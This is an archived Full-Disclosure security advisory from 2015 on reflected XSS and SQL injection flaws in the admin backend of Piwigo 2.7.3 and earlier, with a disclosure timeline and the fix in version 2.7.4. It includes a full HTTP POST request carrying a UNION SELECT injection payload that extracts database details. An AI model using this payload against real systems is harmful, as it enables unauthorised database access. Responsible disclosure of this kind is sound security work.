lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 17 Feb 2015 17:22:29 +0100
From: Steffen Rösemann <>
Subject: [FD] Reflecting XSS- and SQL injection-vulnerabilities in the
 administrative backend of Piwigo <= v. 2.7.3

Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <=
v. 2.7.3
Advisory ID: SROEADV-2015-06
Author: Steffen Rösemann
Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
Vendor URL:
Vendor Status: patched

Vulnerability Description:

Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
administrative backend.

Technical Details:

The reflecting XSS vulnerability resides in the "page" parameter used in
the file admin.php which can be found in the administrative backend located
here in a common Piwigo installation:




The SQL injection vulnerability can as well be found in the administrative
backend and can be found in the "History" functionality located here:


The SQL injection vulnerability can be exploited by appending arbitrary SQL
statements in a POST request to the parameter "user":


POST /piwigo/admin.php?page=history HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
Cookie: pwg_display_thumbnail=no_display_thumbnail;
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 255

AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --


Install the latest version 2.7.4 (released 17th February 2015).

Disclosure Timeline:
08-Jan-2015 – found the vulnerability
09-Jan-2015 - informed the developers
09-Jan-2015 – release date of this security advisory [without technical
09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
17-Feb-2015 - release date of this security advisory
17-Feb-2015 - send to FullDisclosure


Vulnerability found and advisory written by Steffen Rösemann.



Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists